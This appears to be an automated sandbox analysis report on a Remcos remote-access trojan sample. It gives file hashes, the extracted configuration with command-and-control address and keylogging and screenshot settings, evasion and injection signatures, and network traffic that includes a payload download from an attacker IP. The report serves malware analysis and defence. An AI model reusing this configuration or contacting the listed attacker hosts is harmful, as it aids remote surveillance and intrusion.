Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    19/05/2023, 04:51 UTC

General

  • Target

    SYN2023060702.exe

  • Size

    551KB

  • MD5

    e550594dbf07c3a445d0ee6d44325c96

  • SHA1

    ac62125f63e40ed06e6b3cf7a4b180543894d797

  • SHA256

    efcc97c8dac23a0c8bc179fd3b54efd3594e71d5103f211bf468e2a6e550590e

  • SHA512

    92924f57caf0c7b5fc08576d807079c7c060ccecc882766c5298af18288c9cbd9a9d01bd325007b52d983e669e90db9b42fcbe525442887e3de66d9246c1565e

  • SSDEEP

    12288:ZLLsWrDu24O0XFrfiPfuw91uhQ9TaQX5eQ4L1NbRHgWAvHv3cIXsSlwjFh:ZLLTrfj9TaY5eV5N95AfUVSoFh

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

155.94.185.15:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-FUG8H1

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe
    "C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe"
    1⤵
    • Checks QEMU agent file
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe
      "C:\Users\Admin\AppData\Local\Temp\SYN2023060702.exe"
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetWindowsHookEx
      PID:320

Network

  • flag-nl
    GET
    http://194.59.218.151/GXFckquqUZuCKmRXGvLpRrIB64.bin
    SYN2023060702.exe
    Remote address:
    194.59.218.151:80
    Request
    GET /GXFckquqUZuCKmRXGvLpRrIB64.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
    Host: 194.59.218.151
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Thu, 18 May 2023 03:57:07 GMT
    Accept-Ranges: bytes
    ETag: "2d8e55d03c89d91:0"
    Server: Microsoft-IIS/8.5
    Date: Fri, 19 May 2023 04:52:03 GMT
    Content-Length: 488000
  • flag-us
    DNS
    geoplugin.net
    SYN2023060702.exe
    Remote address:
    8.8.8.8:53
    Request
    geoplugin.net
    IN A
    Response
    geoplugin.net
    IN A
    178.237.33.50
  • flag-nl
    GET
    http://geoplugin.net/json.gp
    SYN2023060702.exe
    Remote address:
    178.237.33.50:80
    Request
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    date: Fri, 19 May 2023 04:52:09 GMT
    server: Apache
    content-length: 930
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
  • 194.59.218.151:80
    http://194.59.218.151/GXFckquqUZuCKmRXGvLpRrIB64.bin
    http
    SYN2023060702.exe
    8.6kB
    502.7kB
    183
    361

    HTTP Request

    GET http://194.59.218.151/GXFckquqUZuCKmRXGvLpRrIB64.bin

    HTTP Response

    200
  • 155.94.185.15:2404
    tls
    SYN2023060702.exe
    3.2kB
    1.5kB
    14
    15
  • 178.237.33.50:80
    http://geoplugin.net/json.gp
    http
    SYN2023060702.exe
    301 B
    2.4kB
    5
    4

    HTTP Request

    GET http://geoplugin.net/json.gp

    HTTP Response

    200
  • 8.8.8.8:53
    geoplugin.net
    dns
    SYN2023060702.exe
    59 B
    75 B
    1
    1

    DNS Request

    geoplugin.net

    DNS Response

    178.237.33.50

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    b1e27118ea300aff5faa4ea5ebe8b045

    SHA1

    4f06e5bd97129db44efc4c7bd653311ce96c854e

    SHA256

    7a480cb7be0e96f855ea7043264b4c965aec6074021ca92a9f8344c16305a3e9

    SHA512

    46b163e19b415dc9aa42b8e8adfc4e653068907f9aabff27af73dc71394a8a86c323f7c0dddb67dc07b397f94bf86386735b4dacf66469e2fc02193a1b6871c6

  • \Users\Admin\AppData\Local\Temp\nsy17B8.tmp\System.dll

    Filesize

    11KB

    MD5

    c9473cb90d79a374b2ba6040ca16e45c

    SHA1

    ab95b54f12796dce57210d65f05124a6ed81234a

    SHA256

    b80a5cba69d1853ed5979b0ca0352437bf368a5cfb86cb4528edadd410e11352

    SHA512

    eafe7d5894622bc21f663bca4dd594392ee0f5b29270b6b56b0187093d6a3a103545464ff6398ad32d2cf15dab79b1f133218ba9ba337ddc01330b5ada804d7b

  • memory/320-87-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-69-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-73-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-77-0x0000000001470000-0x00000000055F4000-memory.dmp

    Filesize

    65.5MB

  • memory/320-80-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-84-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-70-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-71-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-91-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-95-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-99-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-102-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-106-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

  • memory/320-110-0x0000000000400000-0x0000000001462000-memory.dmp

    Filesize

    16.4MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.